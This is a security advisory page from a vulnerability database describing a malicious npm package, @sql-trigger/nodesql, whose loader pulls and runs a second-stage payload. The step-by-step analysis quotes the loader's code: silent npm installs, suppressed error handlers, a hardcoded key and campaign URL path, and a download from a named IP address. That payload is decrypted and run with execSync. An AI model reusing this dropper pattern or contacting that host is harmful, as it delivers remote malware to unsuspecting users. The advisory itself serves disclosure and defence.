VDB

GCVE-110-OSM-2026-6565

GCVE-110-OSM-2026-6565
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 24, 2026
This GitHub gist is called by the @sql-trigger/nodesql npm package. This javascript is a loader and pulls another payload from GitHub. A Node.js loader / stage-1 dropper. Static flow: 1. Pre-stages npm dependencies in the OS temp dir (line 675, g.NkKqx = string at line 262): execSync("npm install axios socket.io-client --no-warnings --no-progress --loglevel silent", { windowsHide: true, cwd: os.tmpdir() }) 1. The presence of socket.io-client suggests the second-stage maintains a persistent C2 socket. 2. Silences error reporting (line 680) so the user sees no crash: process.on("uncaughtException", () => {}) process.on("unhandledRejection", () => {}) 3. Derives an AES-256 key from a hardcoded campaign/bot ID (lines 681–683): K = "449715fcb64b249fe789438e2a31e996" // also used as the URL path M = crypto.scryptSync(K, "salt", 32) // literal salt is the word "salt" 4. Fetches the encrypted payload (line 702): GET http://5.231.107.184/api/service/449715fcb64b249fe789438e2a31e996 4. Response body format: "<iv_b64>:<ciphertext_b64>" (split on : into 2 parts at line 707). 5. Decrypts with AES-256-CBC using the scrypt-derived key + supplied IV, then writes the cleartext to <tmpdir>/pack with flag: 'w+' (lines 706–708). 6. Executes the dropped second stage (line 709): execSync("node pack", { windowsHide: true, cwd: os.tmpdir() })

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownall (affected)

Browse GCVE Records

73,442 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›